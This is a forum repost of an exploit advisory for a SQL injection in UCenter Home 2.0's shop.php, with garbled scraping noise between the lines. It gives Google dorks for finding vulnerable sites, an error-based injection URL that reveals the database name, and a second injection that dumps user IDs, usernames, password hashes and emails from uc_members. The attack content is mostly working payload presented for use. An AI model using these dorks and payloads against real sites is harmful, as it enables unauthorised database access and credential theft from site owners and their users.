$ t; M) C! B s$ ? J: `__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ % B& j# J9 q% C+ {3 c( A+ H0 ?. Y
& G2 e& M M2 f
5 R* k% o! C8 d& j8 `4 E+ m# B D8 h3 ^( H& y/ b2 Z% C- T
*/ Author : KnocKout
. Z/ ?$ N% w8 ]) e& i# l! v! H: s! w9 d: v7 N, ?( d
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers - g" _: g& i5 N& b
* s* s" G2 ?" J, d+ i; L0 @
*/ Contact: knockoutr@msn.com / V9 k) K: q1 u& Q8 Q3 {
( u a5 s) U0 e6 M/ p) ^2 t8 b& k
*/ Cyber-Warrior.org/CWKnocKout % c% \( Q |3 {) q
" `& y; p/ ?, o3 k__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== y t5 i. z0 s4 v& z6 E
* G3 h* g( t$ b/ L+ H! T! z3 BScript : UCenter Home / B: \. E) S9 [+ t- Z) z: w
# t* V# |' P5 CVersion : 2.0 4 a* y, }+ Y# \& ?8 t
! T( \( h, m9 c( o4 L
Script HomePage : http://u.discuz.net/
4 Q% K5 h( j& T& j, |7 S, p% v9 t
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
: T& A: S% [# ^+ |9 b* S# U
$ x5 V2 H/ t" v+ E0 {. l. KDork : Powered by UCenter inurl:shop.php?ac=view
9 g/ W0 {1 o; o' ~7 }$ T9 Z, E- n
# J2 Z# b2 M5 EDork 2 : inurl:shop.php?ac=view&shopid= : g9 f0 R9 A- {# t) v
- p" a/ w# V% _6 U( ?. j) S__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) i& d. f# l8 ~# _! o
3 u4 ]# V: [* b, w0 XVuln file : Shop.php : J6 s- y" _$ x6 i
) T8 }2 f. Z5 u8 Y
value's : (?)ac=view&shopid=
. G* E9 g: c6 A$ u
- b% j! z) S5 OVulnerable Style : SQL Injection (MySQL Error Based) / M6 I. {" X5 D7 e5 v
3 V- z7 r8 f" DNeed Metarials : Hex Conversion
& M( T [3 S/ t8 S, i5 ?
9 v0 j+ j8 d) \3 V! n__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== # @2 [. }9 z$ D! \6 I
' g) z0 M, I! N7 }0 }; ]/ ?Your Need victim Database name.
% b8 {) G: d* D6 L( Z X7 t' \7 \+ M1 d7 m% N; i% @
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 * G' k8 J4 ]8 [- N C) X' }6 Q
" E# `/ k; S ?) m# J0 w.. , J3 q" B4 E1 R2 p- k: n+ \) S
0 [& V3 C- v( ?- C) t
DB : Okey.
1 i$ ~3 n& z+ J' ~" E: v6 O j" E* b6 l+ Y; P- E5 x
your edit DB `[TARGET DB NAME]` . m9 X) L$ W V+ e5 L4 P m0 M
- P( @- ^ q0 B" S) x
Example : 'hiwir1_ucenter'
/ b" T+ ?# [. E+ b3 _2 Q; u* b9 c
3 G+ W3 n* p0 n( C' b& WEdit : Okey. 1 {3 ~# W; D! A7 \7 ?/ p1 d
3 }+ w# N4 ~ `1 f4 I. u
Your use Hex conversion. And edit Your SQL Injection Exploit.. # s$ Z: n9 `& I! ]. M: @7 ]
- k& M; K: ^0 ^0 S* q) z( D" O
3 M! U) J( X* S4 q0 J0 C! ?+ Q5 f0 f$ i. H+ w1 f2 e7 f, X- m
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
) g+ {) z6 A9 n4 x3 B1 g/ t/ h |
发表于 2013-2-27 21:31:31
收藏
支持
反对